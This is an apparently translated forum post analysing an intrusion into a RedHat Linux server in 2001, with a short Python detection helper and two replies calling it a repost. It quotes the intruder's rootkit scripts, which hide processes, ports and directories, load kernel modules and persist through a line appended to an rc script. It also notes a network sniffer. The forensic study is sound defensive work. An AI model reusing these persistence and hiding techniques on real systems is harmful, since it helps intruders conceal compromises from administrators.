Author: biyuntian [biyuntian] Forum user
1. The surprise

Time: the afternoon of 2001-3-11. Place: a certain RedHat Linux machine:

    #uname -a
    Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown

Out of habit I went into /etc/rc.d/init.d first, had a look, and immediately spotted something odd:

    #ls -la
    ……
    -rwxr-xr-x   1 root     root         2775 Mar 26  1999 netfs
    -rwxr-xr-x   1 root     root         5537 Mar  3 21:23 network
    -rwxr-xr-x   1 root     root         2408 Apr 16  1999 nfs
    ……

2. Initial check

Obviously a newbie's work: the network file has been touched. Let's look at it with the stat command first:

    #stat network
      File: "network"
      Size: 5537          Filetype: Regular File
      Mode: (0755/-rwxr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
    Device:  3,1   Inode: 269454    Links: 1
    Access: Sun Mar 11 10:59:59 2001(00000.05:53:41)
    Modify: Sun Mar  4 05:23:41 2001(00007.11:29:59)
    Change: Sun Mar  4 05:23:41 2001(00007.11:29:59)

The last change was in the early hours of March 4. Let's see what he added to the file:

    #cat network
    ……
    /usr/lib/libdd.so.1

Just that one line, appended at the end of the file; not a very sophisticated technique indeed. Let's see what kind of file that is first:

    #file /usr/lib/libdd.so.1
    /usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped

Oh, a binary executable. Run strings on it and see if anything looks familiar :)

    #strings /usr/lib/libdd.so.1
    /lib/ld-linux.so.2
    __gmon_start__
    libc.so.6
    system
    __deregister_frame_info
    _IO_stdin_used
    __libc_start_main
    __register_frame_info
    GLIBC_2.0
    PTRh
    /boot/.pty0/go.sh      <-------- this one looks rather interesting

Oh, that makes it simple. Let me look at that path:

    #cd /boot/.pty0
    #cat go.sh
    #!/bin/bash
    f=`ls -al /boot | grep .pty0`
    if [ -n "$f" ]; then
    cd /boot/.pty0
    ./mcd -q
    cd mech1
    ./mech -f conf 1>/dev/null 2>/dev/null
    cd ..
    cd mech2
    ./mech -f conf 1>/dev/null 2>/dev/null
    cd ..
    cd mech3
    ./mech -f conf 1>/dev/null 2>/dev/null
    cd ..
    /sbin/insmod paraport.o 1>/dev/null 2>/dev/null
    /sbin/insmod iBCS.o 1>/dev/null 2>/dev/null
    ./ascunde.sh
    fi

A bit dizzy here; I can't tell what mcd and mech are for. Let's see what the next script is:

    #cat ascunde.sh
    #!/bin/bash
    for proces in `/bin/cat /boot/.pty0/hdm`; do
    P=`/sbin/pidof $proces`
    if [ -n "$P" ]; then
    killall -31 $proces 1>/dev/hdm 2>/dev/hdm
    fi
    done
    for port in `/bin/cat /boot/.pty0/hdm1`; do
    ./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm
    done
    for director in `/bin/cat /boot/.pty0/hdm2`; do
    ./hidef $director 1>/dev/hdm 2>/dev/hdm
    done

At this point things start to get interesting; this doesn't look like the work of some third-rate script kiddie. Let's tar it up and pull it back first, so I:

    #cd /boot
    #ls -la
    total 2265
    drwxr-xr-x   3 root     root         1024 Mar 11 03:01 .
    drwxr-xr-x  21 root     root         1024 Mar  2 03:37 ..
    lrwxrwxrwx   1 root     root           19 Sep 26  1999 System.map -> System.map-2.2.5-15
    -rw-r--r--   1 root     root       186704 Apr 20  1999 System.map-2.2.5-15
    -rw-r--r--   1 root     root          512 Sep 26  1999 boot.0300
    -rw-r--r--   1 root     root         4544 Apr 13  1999 boot.b
    -rw-r--r--   1 root     root          612 Apr 13  1999 chain.b
    -rw-------   1 root     root         9728 Sep 26  1999 map
    lrwxrwxrwx   1 root     root           20 Sep 26  1999 module-info -> module-info-2.2.5-15
    -rw-r--r--   1 root     root        11773 Apr 20  1999 module-info-2.2.5-15
    -rw-r--r--   1 root     root          620 Apr 13  1999 os2_d.b
    -rwxr-xr-x   1 root     root      1469282 Apr 20  1999 vmlinux-2.2.5-15
    lrwxrwxrwx   1 root     root           16 Sep 26  1999 vmlinuz -> vmlinuz-2.2.5-15
    -rw-r--r--   1 root     root       617288 Apr 20  1999 vmlinuz-2.2.5-15

Huh, even more interesting... the .pty0 directory doesn't show up at all.

    #cd .pty0
    #ls -laF
    total 1228
    drwxr-xr-x   3 root     root         1024 Mar 11 03:01 ../
    -rwxr-xr-x   1 root     root          345 Mar  3 21:23 ascunde.sh*
    -rwxr-xr-x   1 root     root        12760 Mar  3 21:23 dec2hex*
    -rwxr-xr-x   1 root     root        13414 Mar  3 21:23 ered*
    -rwxr-xr-x   1 root     root          358 Mar  7 19:03 go.sh*
    -rwxr-xr-x   1 root     root         3872 Mar  3 21:23 hidef*
    -rw-r--r--   1 root     root          956 Mar  3 21:23 iBCS.o
    -rw-r--r--   1 root     root       524107 Mar  7 18:40 m.tgz
    -rwxr-xr-x   1 root     root       656111 Mar  3 21:23 mcd*
    drwxr-xr-x   4 root     root         1024 Mar  7 19:00 mech1/
    drwxr-xr-x   4 root     root         1024 Mar  9 19:50 mech2/
    drwxr-xr-x   4 root     root         1024 Mar  9 19:20 mech3/
    -rwxr-xr-x   1 root     root        12890 Mar  3 21:23 nethide*
    -rw-r--r--   1 root     root        10948 Mar  3 21:23 paraport.o
    -rw-r--r--   1 root     root          522 Mar  3 21:23 ssh_host_key
    -rw-------   1 root     root          512 Mar 11 04:16 ssh_random_seed
    -rw-r--r--   1 root     root          677 Mar  3 21:23 sshd_config

Looks like some LKM has been loaded, which is rather annoying.

    #/sbin/lsmod
    Module                  Size  Used by
    nfsd                  150936   8  (autoclean)
    lockd                  30856   1  (autoclean) [nfsd]
    sunrpc                 52356   1  (autoclean) [nfsd lockd]
    3c59x                  18920   1  (autoclean)

Are these normal LKMs? The first three modules are related to rpc; I don't know which rpc services are open:

    #/usr/sbin/rpcinfo -p localhost
       program vers proto   port
        100000    2   tcp    111  rpcbind
        100024    1   tcp    664  status
        100011    1   udp    673  rquotad
        100005    3   tcp    695  mountd
        100003    2   udp   2049  nfs
        100021    3   tcp   1024  nlockmgr

So that's it; no wonder it got broken into, everything that could be opened is open. But this also proves that the three modules nfsd, lockd and sunrpc are fine. Now let's look at the network card; 3c59x is the NIC driver module.

    #/sbin/ifconfig -a
    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:3924  Metric:1
              RX packets:380640 errors:3374 dropped:0 overruns:0
              TX packets:0 errors:0 dropped:0 overruns:380640

    eth0      Link encap:10Mbps Ethernet  HWaddr 00:10:5A:63:5B:05
              inet addr:*.*.*.*  Bcast:*.*.*.255  Mask:255.255.255.0
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:71144611 errors:820101 dropped:0 overruns:0
              TX packets:0 errors:0 dropped:0 overruns:436037129
              Interrupt:10 Base address:0xe400

    #dmesg|grep eth0
    eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400, 00:10:5a:63:5b:05, IRQ 10
    eth0: Setting promiscuous mode.
    device eth0 entered promiscuous mode

Looks like these modules are all normal, but the nasty part is this: "device eth0 entered promiscuous mode". The intruder has set up a sniffer and is listening. The key point, though, is that this intruder has loaded something I can't see, which is a bit dizzying... Wait, right, let's look at the file names first……
Original poster, posted: 04/23 04:45
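As an added example (not from the original post or the machine it describes): a small Python triage helper that codifies three of the checks walked through above, a bare shared-library path appended to an rc script, embedded strings pointing into a dot-directory, and the kernel's promiscuous-mode message, run over constructed sample input modelled on the page's output.

```python
"""Triage helpers mirroring the page's checks. All sample inputs below are
constructed to resemble the page's output; they are not the original data."""
import re

# Constructed init-script tail, modelled on the modified /etc/rc.d/init.d/network.
SAMPLE_INIT_SCRIPT = """#!/bin/sh
# network       Bring up/down networking
. /etc/sysconfig/network
/sbin/ifup eth0
/usr/lib/libdd.so.1
"""

# Constructed `strings` output, modelled on the page's /usr/lib/libdd.so.1 loader.
SAMPLE_STRINGS = """/lib/ld-linux.so.2
__gmon_start__
libc.so.6
system
/boot/.pty0/go.sh
"""

# Constructed dmesg lines, modelled on the page's `dmesg | grep eth0`.
SAMPLE_DMESG = """eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400, 00:10:5a:63:5b:05, IRQ 10
eth0: Setting promiscuous mode.
device eth0 entered promiscuous mode
"""

BARE_PATH = re.compile(r"^\s*(/\S+)\s*$")          # a line that is only a path
SHARED_LIB = re.compile(r"\.so(\.\d+)*$")          # libfoo.so / libfoo.so.1 names
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")            # a dot-directory in a path
PROMISC = re.compile(r"device (\S+) entered promiscuous mode")

def suspicious_init_lines(script_text):
    """(line_no, path) for lines that run a shared-library-named file as a
    command. Libraries are never launched this way, so an rc script doing so
    is the 'append one path to an rc script' persistence pattern above."""
    hits = []
    for n, line in enumerate(script_text.splitlines(), 1):
        m = BARE_PATH.match(line)
        if m and SHARED_LIB.search(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

def hidden_path_strings(strings_text):
    """Embedded strings whose path passes through a dot-directory (/boot/.pty0/)."""
    return [s for s in strings_text.splitlines() if HIDDEN_DIR.search(s)]

def promisc_interfaces(dmesg_text):
    """Interfaces the kernel reported entering promiscuous mode (sniffer hint)."""
    return sorted({m.group(1) for m in PROMISC.finditer(dmesg_text)})
```

On a live system the same functions can be fed the real file, `strings` output and `dmesg` text; a hit on all three is the combination the post above found.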
Reply: xiaojun [xiaojun] Swordsman
Damn! I thought this was your own work? Turns out it's a repost! And reposted twice over, at that. Go to the UNIX section and look at the intrusion analysis by 夜色撩人 and see how it differs from yours. Hey, take it easy!………
Floor B1, posted: 04/23 09:08
Reply: 54183710 [hcz] Forum user
I think I saw this article several years ago already.
Floor B2, posted: 04/26 17:23
Copyright 20CN Network Security Group.
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
Guangdong ICP registration no. 05087286